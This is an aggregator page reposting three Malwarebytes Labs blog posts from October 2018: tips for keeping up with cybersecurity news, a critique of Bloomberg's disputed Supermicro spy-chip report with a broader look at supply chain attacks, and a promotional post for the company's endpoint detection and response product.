One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach would be to simply keep your programs updated at all times so there’s no chance a cybercriminal can exploit the vulnerability and gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Bloomberg blunder highlights supply chain risks

Malwarebytes - Wed, 10/10/2018 - 16:00

Ooh boy! Talk about a back-and-forth, he said, she said story!

No, we’re not talking about that Supreme Court nomination. Rather, we’re talking about Supermicro. Supermicro manufacturers the type of computer hardware that is used by technology behemoths like Amazon and Apple, as well as government operations such as the Department of Defense and CIA facilities. And it was recently reported by Bloomberg that Chinese spies were able to infiltrate nearly 30 US companies by compromising Supermicro—and therefore our country’s technology supply chain.

If you’ve been trying to follow the story, it may feel a bit like this:

What do we know so far

On October 4, Bloomberg Businessweek detailed a narrative regarding Chinese government influence into the operations of US-based hardware manufacturer Super Micro Computer, Inc., or simply Supermicro. The article was produced using information from 17 different anonymous sources including “one from a Chinese foreign ministry,” and draws on research spanning more than three years of investigations.

The article alleges that operatives from a unit of the People’s Liberation Army used a method known as seeding to compromise the Supermicro supply chain. They did this by coercing Chinese-based subcontractors responsible for the creation of the hardware circuitry to secretly install a high-tech spying chip into the motherboards and systems of computers destined for high-profile customers.

Bloomberg suggests the access by top-level operatives allowed the Chinese government to conduct a highly-targeted and highly-complex spying operation against worldwide organizations and in all sectors of business, including finance, health, government, and private.

That little chip is what the Bloomberg article says is responsible.

According to the article, the problem stems from a tiny microchip, not any bigger than a pencil tip, and that had been embedded to the electronic circuitry of compromised devices. Though the intent of the microchip remains uncertain, the article suggests it was capable of communicating with anonymous computers on the Internet and loading new code to the device operating system.

In at least one case, the malicious microchips are alleged to be thin enough as to be embedded in between the layers of fiberglass onto which the other components were attached.

The malicious microchip can be embedded between layers of hardware fiberglass.

The chips have the ability of being able to modify the instructions between the operating system and CPU, and can allow for code injection or other data-alteration techniques. The code has also created a stealth doorway into the networks of altered machines.

Or as Bloomberg put it:

The implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard. This happened at a crucial moment, as small bits of the operating system were being stored in the board’s temporary memory en route to the server’s central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

Talk about some deep-state, James Bond–level stuff.

Here, we have a story detailing illicit government operations and covert operatives who have systematically compromised the supply chain of one of the world’s largest motherboard and custom hardware manufacturers. Threat actors have accomplished this using a deeply-technical and highly-targeted—not to mention a nearly impossible mechanism to detect—hardware attack utilizing incredibly small, sophisticated microchips that are embedded between the individual hardware fiberglass layers.

And why did they do it? To initiate clandestine spying operations against some of the worlds’ largest entities in order to exfiltrate sensitive intellectual property and top-secret government information.

Quick, call a Hollywood director. I have a story to pitch!

This is indeed a fantastic story filled with all sorts of nail-biting suspense and adventure, but just like any good Hollywood caper, we have to ask ourselves: Is there any truth to it? We imagine that when storytellers got a whiff of this tale, they did something like this:

Did that really happen?

One problem with verifying this story is that this type of attack isn’t detectable by any security solution. Right now, no one can detect hardware-level modifications using custom hardware solutions that have been systematically installed at the manufacturer level. That kind of detection protocol just doesn’t exist yet.

Another problem: Aside from the S.O.C.-generated network logs pointing fingers at compromised machines and vulnerable networks—for which the article said there were none—no one can prove or disprove this story.

Few security researchers are going to have access to the $100,000+ computers where these chips are said to reside. And even fewer of those researchers work for organizations that will let them start analyzing and ripping capacitor-looking circuits from the board. So basically, we’re left having to trust the anonymous sources used for the report.

This state of unknown even led well-known Google security researcher Tavis Ormandy to liken the event to the chemtrails conspiracy theory and the hunt for Sasquatch.

In the days since Bloomberg’s publication of the story, there have been significant rebukes and outright denials from the companies and government agencies cited in the report. Here’s what’s been said:

  • Amazon called the information untrue and doubled down on the statement by saying it was also untrue it had worked with or provided information to the FBI regarding malicious hardware.
  • Apple said they had repeatedly and consistently refuted every aspect of Bloomberg’s story during pre-publication verification efforts, and refute virtually every aspect of the article now.
  • Supermicro denied most, if not all, aspects of the Bloomberg story.
  • China’s Ministry of Foreign Affairs indicated the government intrusion into the product supply chain would violate China’s commitment to the proposal of the 2011 International Code of Conduct for Information Security.
  • And the United States Department of Homeland Security said it had no reason to question denials by US technology companies (though this doesn’t really refute the claims).

To further muddle the information, the only two named technology experts have backpedaled their statements since publication.

Joe Grand, cited hardware hacker and founder of Grand Idea Studio, Inc., claimed in a recent Twitter post that his quote was given over a year ago and broadly relating to the ultimate story.

In a fascinating podcast on, Joe Fitzpatrick, founder of Hardware Security Resources, expressed concerns regarding the accuracy of the reporting, and claims his statements were taken out of context. In an email exchange provided by Fitzpatrick and read aloud on the podcast, Fitzpatrick expresses skepticism to Bloomberg reporters over the financial cost and scalability of the device.

“The whole setup doesn’t really make sense,” the email is quoted as saying. “It just doesn’t make sense to spend the time and money to do what you are describing. Are you sure that the person who did the analysis had actual hardware knowledge and understanding?” Fitzpatrick concludes, “I’m incredibly skeptical.”

So basically, all of the reporting on this story fell apart post-publication, and everyone involved has denied the aspects of the story. Oops!

Supply chain attacks are real

Even though Bloomberg may (or may not) have got the details wrong on this one, the scenario the story brings up is entirely plausible—though maybe not with the sensationalism portrayed in the article. In fact, supply chain compromises, hardware faults, and outright counterfeits are not at all uncommon. There have been numerous events across the globe that highlight the dangers that audit-free software and single points of failure can introduce.

Just last year, the popular Ukrainian tax software Medoc was subject to a compromised update that went out automatically to millions of customers. The attack resulted in the distribution of the EternalPetya ransomware.

Earlier this year, popular PC cleaner CCleaner was victim of an advanced APT backdoor that came as part of a software supply chain attack. In this multi-thronged attack, threat actors infected 2.27 million users in the first stage. After analyzing the collected information for high-value targets, only 40 were chosen for second-stage attacks and additional espionage efforts. This type of concentrated effort shows the extent attackers are willing to go to infect high-value and potentially lucrative industries and organizations.

Let’s also not forget that Edward Snowden detailed an NSA program that alleged backdoors planted in Cisco products allowed for spying on 20 billion communications each day—or the allegations that the NSA compromised hard drive manufacturers from all over the world to install malware that remained undetected for as long as two decades. Or how Mark Klein detailed secret, unmarked rooms at AT&T from which covert spying operations were being run.

And this doesn’t even touch on the countless vulnerabilities, IOT botnets, default password attacks, or the many other vectors that can be used to launch malware toward systems, peripherals, routers, and other hardware devices we use on a daily basis.

Unfortunately, few of these devices or systems are covered by security solutions that can protect from or remediate the unwanted code and malicious behaviors.

But don’t be fooled. This doom and gloom isn’t just isolated to high-tech computer components and state-sponsored spying. Nor is the problem isolated to components originating from specific geographic regions.

Due to deep supply chains and razor-thin profit margins, consumers face risks every day when at the checkout counter. Consumables can be compromised, either knowingly or not, and with malicious intent or not, in any one of the many downstream transports. This relates to everything from cheap computers and phones purchased from third-party markets all the way down to pet food and lettuce that you buy from your local supermarket. Even the vehicle you drive may have faults attributable to supply-chain issues.

There have been millions of instances where food, phones, computers, manufacturing goods, and virtually every other product known to man have shipped with vulnerabilities or been susceptible to supply-chain tampering.

So what do we do?

Admittedly, that’s a tough nut to crack.

Few in the security industry possess the necessary skills to comprehend—let alone reverse engineer—malicious hardware components that are deliberately designed to look like obscure, legitimate hardware components and are hidden within pin-point modules. And do any of us have the time or desire to understand the inner workings of the devices and systems we purchase? Okay, perhaps a few do.

To make matters worse, there aren’t any security products on the market that have the capability to protect against the sort of sophisticated and targeted attack outlined in the Bloomberg report. To steal a quote from the article: “This stuff is at the cutting edge of the cutting edge, and there is no easy technological solution.”

Regardless of the device or the origin of the product, businesses and consumers alike need to perform due diligence when purchasing devices and products. The risk tolerance may need to be assessed to determine if a particular service or product is worth the potential detriment of losing sensitive information—or other valuable data, time, and peace of mind.

Businesses may wish to conduct hardware security audits on newly-acquired equipment to check for suspicious behavior. IT departments should also consider rolling out updates and patches in staggered succession to monitor for flaws or undesirable effects, thus isolating these problems to a few machines rather than the entire company. And, of course, adopting early technologies should be off-limits for security-conscious enterprises as these products have not yet received the scrutiny of the security community.

How can consumers and businesses truly protect themselves, then? The real answer is “they can’t.” Consumers can never be 100 percent assured the devices and software they buy will be completely harmless.

Without the ability to analyze and reverse-engineer every single device and bit of code that is used, customers have few fail-safe methodologies to ensure their products are free of defect. They must simply research, use common sense, and trust that they’re aligning themselves with products and companies that take the privacy and security of their customers seriously.

Aligning with security best practices, doing due diligence, and conducting a cost/benefit analysis are all good suggestions to follow. But also in this case, maybe crossing your fingers and saying a prayer is just as viable a suggestion.

The post Bloomberg blunder highlights supply chain risks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

When Endpoint Detection and Response (EDR) is not enough

Malwarebytes - Tue, 10/09/2018 - 15:00

As cybercriminals continue to validate the reality that no prevention-based security control is going to stop every threat every time, companies are expanding beyond prevention-only approaches and closing the gap with endpoint detection and response solutions.

But as we consider this strategy, one pressing question is: How big is the gap? If prevention security isn’t 100 percent effective, how effective is it? A popular perception of businesses is that prevention security is about 98 percent effective with a mere 2 percent of threats slipping by. However, the reality is far worse.

Because our product is most often used for malware remediation on business endpoints, we have extensive telemetry on this gap where current endpoint protection technologies are failing to keep organizations safe. Our data shows that current endpoint protection platform vendor software is approximately 40 percent effective, based on endpoints using Malwarebytes for clean up. That means 60 percent of those endpoints were found to be harboring hidden threats—including Trojans, backdoors, and rootkits.

Framing up the size of the gap is important because it helps organizations prioritize the capabilities they need in their endpoint detection and response (EDR) solution—namely, automated and complete remediation.

Until recently, organizations have turned to EDR to gain greater visibility into what’s happening on endpoints. While helpful and important, visibility doesn’t provide a silver-bullet solution for fast and effective remediation. Incident response (IR) teams still face challenges when managing multiple platforms, chasing false alerts, and manually handling the remediation process.

Lack of visibility into and quick remediation of threats leads to long infection dwell times. In fact, according IR teams interviewed for the 2017 SANS Incident Response Survey, 28 percent report the time from detection to remediation is between 6 to 24 hours. The picture is much more grim in the 2018 Verizon Data Breach Investigations Report, where more than 70 percent of organizations were comprised by a breach within minutes, but discovery of that breach took months for 60 percent of respondents. A further 30 percent took days to contain a breach after discovery and a still solid 10 percent took additional months to get their breach under control.

In addition to dwell time, manual remediation itself is resource-intensive, often involving a lengthy re-imaging process for IR teams, and lots of lost productivity for employees—not to mention the tedious re-installation of end-user applications and customization of personal settings.

There’s a better way.

Breaches are inevitable, and the true size of the prevention gap is much bigger than many realize. As such, remediation capabilities are essential for today’s organizations. To truly close the gap and remediate hidden threats, the “response” portion of EDR solutions need to go beyond alerting to actually fixing the endpoint.

And that’s what we aim to do with Malwarebytes Endpoint Protection and Response. Using a single, unified agent to deliver endpoint protection, detection, and response, our solution effectively alleviates expertise challenges and eliminates the resolution gap. Our product consists of three key components:

1. Prevent

Malwarebytes Endpoint Protection and Response uses a seven-layered, Multi-Vector Protection (MVP) approach, which includes both static and dynamic detection techniques, to seek out a wide range of threats delivered via different attack vectors.

2. Detect

Our solution provides continuous endpoint monitoring and visibility using machine learning anomaly detection combined with aggressive anomaly detection scoring, which is integrated with our cloud sandbox detonation.

3. Respond

Malwarebytes goes beyond alerting and actually fixes the problem with thorough remediation, and even rollback for ransomware infections. Our fast and effective response includes complete removal of infections and artifacts—all with minimized end-user impact.

The result is advanced protection capabilities plus EDR capabilities, packaged with not only visibility into threats but the ability to quickly remediate those threats and fix endpoints.

Malwarebytes isn’t like other security companies. With remediation in our DNA, we do everything in our power to stop attacks before they happen, but we never assume that cybercriminals won’t find a way. That’s why we’ve focused on being the best at finding and removing known and unknown threats.

Learn more about how to remediate threats with Malwarebytes Endpoint Protection and Response.

The post When Endpoint Detection and Response (EDR) is not enough appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds